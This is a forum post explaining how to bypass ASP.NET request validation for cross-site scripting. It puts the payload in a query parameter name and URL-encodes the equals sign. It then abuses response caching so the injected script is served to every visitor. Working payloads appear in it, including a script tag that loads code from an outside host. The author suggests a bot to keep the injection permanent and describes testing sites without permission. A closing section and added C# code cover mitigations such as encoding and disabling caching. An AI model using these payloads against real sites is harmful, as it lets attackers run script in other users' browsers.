ASP.NET Request.QueryString XSS Filter Bypass - Convert Reflected XSS to Stored XSS

numaN (Growth Hacker, Staff member, Administrator; joined Sep 11, 2019)
Hi guys! Hope you are all doing well.

I was surfing the net and visited a website, just tried some payloads (I do this on every website I visit), and I discovered some ways to bypass ASP.NET's XSS filtering. I looked on Google but couldn't find a post about how to bypass ASP.NET XSS filtering like my method; either it is not known or nobody has written about it before. So, I decided to write this post.

Most ASP.NET apps and websites are affected by this vulnerability. You can use this method in your pentest and bug bounty work. Let us start:

There are some restrictions while you are trying to inject XSS payloads:
  • "A potentially dangerous Request.QueryString value was detected from the client" error
  • Character count limit
  • Special character filtration (like = " < >)
I will show you how to bypass them and how to convert reflected XSS to stored XSS.

1)- Bypass character count limit:

1.png

I tried the <s> tag and the system blocked me but somehow printed the error, so my <s> tag worked.


Now let me try to write a long text:
2.png

I wrote <s>123456789abcdefghijklmnoprstuvyz123456789abcdefghijklmn but only 20 characters are shown.
How to bypass? Let us write the payload as parameter name...


Finally, the character count limit is bypassed:
3.png

Now, you can write the loooongest payload, it will work. :cool:

2)- Bypass special character filtration:
You saw that your HTML tags work and the character count limit is already bypassed; now you want to run JavaScript in the page. I have specified 2 payloads:
  • <script/src=//15.rs></script>
  • <script>alert(2);</script>
(I will use Firefox to run JS; I don't want to bother with Chrome's XSS Auditor)

Or you can write more... Let us check whether our payloads work or not:

4.png

It didn't work; somehow the system is blocking JavaScript from running, adding " or deleting something, so our payload is not working.
(URL: https://******.com/file.aspx?<script/src=//15.rs></script>=<s>)

Let us encode the = sign by URL encoding method.
= : %3D

Visit:
https://******.com/file.aspx?<script/src%3D//15.rs></script>=<s>
5.png

6.PNG



Special character filter & XSS filter has been bypassed...

3)- Convert Reflected XSS to Stored XSS
Yes, it is really possible! :ROFLMAO: I was very surprised when I saw how I converted RXSS to SXSS.

Somehow, some ASP.NET websites are caching all queries for 5-10 minutes. For example:
Visit here first, and then visit:
You will still see results for the "TEST" query.

How to do?
1)- Visit the page with your XSS payload embedded
2)- Visit the page again without payloads; you will see it is cached and printed

7.png

I visited and got an error. No problem, let us now visit the ErrorPage.aspx file without parameters.


8.png


As you can see, it is cached and we have bypassed ASP.NET Request Validation protection and converted it to Stored XSS.
Also, you can visit this website from different devices; it is cached for everybody, not only for your browser.
This cache gets purged automatically in 5-10 minutes; you can write a bot and exploit this vulnerability permanently.

4)- How to avoid XSS in ASP.NET?

Of course, this method is not valid for all ASP.NET websites, but you had better apply these:
  • Install the Microsoft Anti-XSS library and change your code
from <%= Request.QueryString("parameter") %> to <%= Microsoft.Security.Application.Encoder.HtmlEncode(Request.QueryString("parameter")) %>

  • Disable in-page error printing
  • Disable caching
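To make the three mitigations above concrete, here is an added example (not from the original post, and not any real site's code) of a hardened ASP.NET Web Forms code-behind. It applies the post's advice with the built-in HttpUtility.HtmlEncode (the post's Microsoft.Security.Application.Encoder.HtmlEncode is a drop-in alternative) and marks the response as non-cacheable. One caveat a defender should take from the post: the payload above was carried in the parameter name, not the value, so encoding only Request.QueryString("parameter") leaves any code that reflects parameter names (error pages included) exposed; the example therefore encodes keys as well as values. The page class SafeEcho, the Literal control EchoList, and the web.config notes in the comments are assumptions for illustration.

```csharp
// Added example (not from the original post): hardened Web Forms code-behind.
// Class and control names (SafeEcho, EchoList) are constructed for illustration.
using System;
using System.Text;
using System.Web;
using System.Web.UI;

public partial class SafeEcho : Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        // "Disable caching": a response that echoes request data must never be
        // stored by an intermediary or the output cache and served to others.
        // If the .aspx carries an <%@ OutputCache ... VaryByParam="none" %>
        // directive, remove it as well (assumed cause of the behaviour described).
        Response.Cache.SetCacheability(HttpCacheability.NoCache);
        Response.Cache.SetNoStore();
        Response.Cache.SetExpires(DateTime.UtcNow.AddDays(-1));

        // "Disable in-page error printing": keep <customErrors mode="RemoteOnly">
        // (or "On") in web.config and do not echo request details on the error
        // page; request validation stays enabled (ValidateRequest="true").

        // Encode BEFORE reflecting, and encode the NAME as well as the value:
        // a query such as ?<s>=x arrives with the tag in the key.
        var sb = new StringBuilder();
        foreach (string key in Request.QueryString.AllKeys)
        {
            // A parameter without '=' (e.g. ?foo) yields a null key in ASP.NET.
            string safeKey = HttpUtility.HtmlEncode(key ?? string.Empty);
            string safeValue = HttpUtility.HtmlEncode(Request.QueryString[key] ?? string.Empty);
            sb.Append("<li>").Append(safeKey).Append(" = ").Append(safeValue).Append("</li>");
        }

        // EchoList is an <asp:Literal> on the page (constructed for this example).
        EchoList.Text = sb.ToString();
    }
}
```

With this in place, a request whose key or value contains <s> or <script> renders as literal text (&lt;s&gt;), and because the response is marked no-store the page cannot be replayed from a shared cache to other visitors.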

Also, this method is valid for POST-based exploitation too.

Some websites have been hacked with this method:
(Don't use for illegal purposes!)

Hope you liked the post, happy hunting. :coffee:

numaN
Still live.